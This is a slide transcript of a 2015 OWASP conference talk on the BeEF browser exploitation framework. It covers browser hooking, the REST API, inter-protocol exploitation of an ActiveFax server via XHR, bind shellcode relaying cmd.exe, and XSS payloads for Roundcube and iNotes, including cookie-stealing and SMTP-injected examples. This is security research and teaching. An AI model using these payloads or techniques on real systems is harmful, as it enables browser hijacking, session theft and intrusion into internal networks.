owasp appseceu 2015 - beef session
TRANSCRIPT
whoami
Bart Leppens
● BeEF developer (since may 2012)● Ported BeEF Bind shellcode to Linux● Smashing the stack for FUN
@bmantra In
Disclaimer
● The views and opinions expressed here are my own and do not necessarily represent those of my employer
● My employer has absolutely nothing to do with anything related to BeEF
● I’m not speaking in the representation of my company
What the talk?
● BeEF: Browser Exploitation Framework○ architecture○ modules○ extensions
● … live demos and videos
BeEF: Browser Exploitation Framework
● Professional security tool● Focus on client side attack vectors● Real attack scenarios● v1.0 by Wade Alcorn
http://beefproject.comhttps://github.com/beefproject/beef
BeEF: Live CD
● https://github.com/beefproject/beef/wiki/BeEF-Live-CD
● Ubuntu 12.04 LTS● Ruby 1.9.3p194● Metasploit and sqlmap
BeEF: Hook a Browser
Inject the javascript hook to the DOM● Cross-site Scripting● MiTM● Controlling DNS● Social Engineering● … be creative ;)
BeEF: Polling
● Once the browser is hooked, the browser will ‘poll’ BeEF for new JavaScript payloads to execute
● When a payload is found, the browser will execute it
BeEF: A Whole Lot Of Modules● Many different purposes
○ Information gathering○ Social Engineering○ Network Discovery○ ...
● Easy to extend with your own modules● Complex scenarios with RestFul API
http://beefproject.comhttps://github.com/beefproject/beef
BeEF: Module overviewEach module contains 3 primary files:
● config.yaml => Configuration file● module.rb => Ruby Module Code● command.js =>JavaScript payload
http://beefproject.comhttps://github.com/beefproject/beef
BeEF: config.yamlProvides basic information
● name of author● category● working browsers● determines if module is enabled
http://beefproject.comhttps://github.com/beefproject/beef
BeEF: module.rb
Defines configurable options (self.options)
Defines return result actions (post.execute)
http://beefproject.comhttps://github.com/beefproject/beef
BeEF: command.jsJavaScript payload template
● Supports eRuby variable substitution
<%= @var %>
● Access to the JavaScript BeEF object
beef.net.forge_request
BeEF: Sesame Magic Browser
“Internal server vulnerabilities are sitting there bored and lonely” - Michele Orru` // ”ActiveFax, you look very bored” - Bart Leppens
BeEF: GlassFish XSRF
● REST CSRF in GlassFish 3.1.1 (build 12)● Bug FOUND by Roberto Suggi Liverani● According to ORACLE the 3th most critical
bug ever in SUN products● Demo (fingerprint + exploit)
BeEF: CookieJar overflow
● JavaScript cannot modify HTTPOnly-cookies● John Wilander overflowed the CookieJar● Recreate those cookies● Demo
BeEF: Autorun
● launch modules automatically on new hooked browsers
● edit config.yaml set autorun: true in each module
● limitation => used with default parameters
BeEF: RESTful API
Scripting BeEF through HTTP/JSON requests● token parameter must be always added to
requests● GET or POST● Automate advanced attacks automatically
BeEF: RESTful API
Authentication● Post credentials to /api/admin/login● return authentication token● e.g. curl -H "Content-Type:
application/json" -X POST -d '{"username":"beef", "password":"beef"}' http://127.0.0.1:3000/api/admin/login
BeEF: RESTful API
Hooked Browsers● GET to /api/hooks● return online/offline hooked browsers● e.g. curl http://127.0.0.1:
3000/api/hooks?token=[token]
BeEF: RESTful API
Browser Details● GET to /api/hooks/:session● Information on the hooked browser● e.g. curl http://127.0.0.1:
3000/api/hooks/[session]?token=[token]
BeEF: RESTful API
List Command Modules
● GET to /api/modules● e.g. curl http://127.0.0.1:
3000/api/modules?token=[token]
BeEF: RESTful API
Informations on a specific module
● GET to /api/modules/:module_id● e.g. curl http://127.0.0.1:
3000/api/modules/[module_id]?token=[token]
BeEF: RESTful API
Launch a command on a specific browser
● POST to /api/modules/:session/:module_id● e.g. curl -H "Content-Type:
application/json; charset=UTF-8" -d '{"question":"wtf?"}' -X POST http://127.0.0.1:3000/api/modules/[session]/[module]?token=[token]
BeEF: RESTful API
Return information about the command module previously executed
● GET to /api/modules/:session/:mod_id/:cmd_id
● e.g. curl http://127.0.0.1:3000/api/modules/[session]/[module_id]/[cmd_id]?token=[token]
BeEF: RESTful API
A whole lot more:
● control BeEF DNS rules● Access Logs● ...Refer to the BeEF Wiki: https://github.com/beefproject/beef/wiki/BeEF-RESTful-API
BeEF: Console
Console is a BeEF extension● metasploit-like console● should be enabled in the main config.
yaml● control hooked browsers
BeEF: Metasploit integration
Console is a BeEF extension● should be enabled in the main config.
yaml● should be configured in
extentions/metasploit/● msfrpcd can be launched automatically
from within BeEF :-)
IPC: Inter-Protocol Communication● Initial research by Wade Alcorn in 2006/2007● “Tolerant” protocol implementation that does
not drop the client connection after N errors● A properly encoded POST request can be
send to the target:○ HTTP Headers are parsed as BAD COMMANDS○ HTTP request body is parsed as VALID
COMMANDS (or as SHELLCODE)
IPC: Limitations● Some ports are banned by the Browser (e.g.
21,25,110,..)● Content-Type: text/plain or multipart/form-
data● Doesn’t work well with binary protocols =>
often not that tolerant
IPC: ActiveFax Server● Extended research done in 2013 by Michele
Orru` & myself● Widely used Fax solution● Manual suggest port 3000 for RAW socket● Protocol is very tolerant● Commands are formatted as: @Fxxx data@
IPC: ActiveFax Server (example message)Sender...................... Bart Leppens, +1 11 112233-25Recipient 1............... OWASP Belgium, Fax: 016 123456Subject..................... IPC is coolPriority...................... Very High
@F101 Bart Leppens@@F110 +1 11 112233-25@@F201 OWASP Belgium@@F211 016 123456@@F307 IPC is cool@@F301 1@
IPC: ActiveFax Server (XHR)var xhr = new XMLHttpRequest();var uri = "http://x.x.x.x:3000/";xhr.open("POST", uri, true);xhr.setRequestHeader("Content-Type", "text/plain");var post_body = "@F101 Bart Leppens@@F110 +1 11 112233-25@@F201 OWASP Belgium@@F211 016 123456@@F307 IPC is cool@@F301 1@";xhr.send(post_body);
IPC: ActiveFax Server (XHR)POST / HTTP/1.1Host: 127.0.0.1:3000User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:24.0) Gecko/20100101 Firefox/24.0..Content-Type: text/plain; charset=UTF-8Cache-Control: no-cache
@F101 Bart Leppens@@F110 +1 11 112233-25@@F201 OWASP Belgium@@F211 016 123456@@F307 IPC is cool@@F301 1@
IPC: ActiveFax Server (Time-out)The ActiveFax RAW socket takes 60 seconds to time-out.We can fix that! 2 seconds is more then enough to send a FAX over a LAN network:
xhr = new XMLHttpRequest();..xhr.send(post_body);setTimeout(function(){xhr.abort()}, 2000);
BeEF: NAT Pinning
● Samy Kamkar in 2010● Trick user to visit page● Access port on internal network (via IPC)● Connection Tracking must be enabled● not only routers, IPTables with connection
tracking works as well
IPE: Inter-Protocol Exploitation
● Research by Wade Alcorn (extension of IPC)● Extended research in 2012 by Michele Orru`
○ QualCOMM WorldMail IMAP 3.0● More research in 2013 by Michele & myself
○ ActiveFax Server
IPE: Inter-Protocol Exploitation
● Need to send binary data○ sendAsBinary (FF, Chrome)
● Same restrictions: tolerance, blocked ports● More restrictions: header space, bad chars
IPE: ActiveFax 5.01 RAW Server Exploit
● bug found by Craig Freyman● @F506 crashes after 1024 bytes● Many bad characters:
○ 0x00 -> 0x19○ 0x40 (@)
● PoC modified to use IPE
BeEF Bind Shellcode
● Shellcode written by Ty Miller (Win32)● Allows communication from the browser to a
shell○ Commands are proxied back and forth through the
browser to cmd.exe○ Stage is delivered through the browser as well
BeEF Bind Shellcode: The Stager● Stager listens on a specified port for HTTP
requests● Ignores HTTP headers and looks for the egg
“cmd=” which marks the start of our 2nd stage (or any stage you like)
● Allocate executable memory + copy● Jump into the stage shellcode
BeEF Bind Shellcode: The Stage● Stage listens on a specified port for HTTP
requests as well● Ignores HTTP headers and looks for “cmd=”
which marks the start of our command● Requests are proxied back and forth from
the browser to a “cmd.exe” childprocess● Access-Control-Allow-Origin: *
BeEF Bind Shellcode:
● Ported to Linux x86 and Linux x64○ stager and stage
● Can also be used compiled with RCE vulns● Metasploit modules are available for easily
encoding and removal of bad characters
Exploiting Webmail with XSS
Cross-site Scripting● most common vulnerability● impact = underestimated● mail = interesting target for attacker
CVE-2011-2937 Round-cubereflected Cross-site Scripting vulnerability● found by Abyszko● before 0.5.4
http://server/roundcube/?_mbox=<script> alert(document.cookie)</script>
CVE score for this bug is 4.3 out of 10.
CVE-2014-0913 Lotus iNotesstored Cross-site Scripting vulnerability● IBM iNotes and Domino 8.5.3 FP6 before
IF2 and 9.0.1 before FP1● Inject arbitrary web script or HTML via an e-
mail message
CVE score for this bug is 4.3 out of 10.
CVE-2014-0913 Lotus iNotestelnet iNotesSMTPserver 25
HELO xss MAIL FROM: [email protected] RCPT TO: [email protected] DATA MIME-Version: 1.0 FROM: ATTACKER <[email protected]> TO: VICTIM <[email protected]> Subject: iNotes XSS vulnerable mail Content-Type: text/html
<img style="display:none" src="x"/onerror="alert(1)">
Universal Cross-site Scripting and webmail
● Control every origin● Execute arbitrary code● Control all webmail clients => including
Cloud based like gmail, yahoo mail, etc.
This is a myth: there ain’t no such thing● Targeted mailbox attack
○ read mails○ send mails
● Nesting and replication○ Mailworm - Nduja by Rosario Valotta in
2007■ spreading across multiple webmail services■ named after spicy italian sausage from Calabria,
Italy
This is a myth: there ain’t no such thing
● DDoS of server○ BeEF DOSer-module○ also internal servers (via victims browser)
● DDoS of mailbox○ multiple zombies sending mails to victim
This is a myth: there ain’t no such thing
● Sending spam○ by email account of trusted user
● Download infection○ attachment that seems to be sent from
well-know user (=victim)○ Replace attachment links in existing mails
This is a myth: there ain’t no such thing
● Modify existing “notes”● Social Engineering attacks by mail● Perform reset of passwords● names.nsf in iNotes● ….
Tunneling Proxy
Reverse HTTP Proxy● hooked browser = exit point● XHR requests or WebSockets● limited to the hooked domain and security
context of the victims browser
Tunneling Proxy
Attack scenarios ● browsing hooked domain (security context of
the victim browser)● spidering hooked domain● finding and exploiting SQLi with Burp Pro
Scanner and sqlmap● Video
For those who can’t get enough
● Browser Hackers Handbook○ 50% of revenues will be used for
the BeEF project (testing infrastructure, etc..)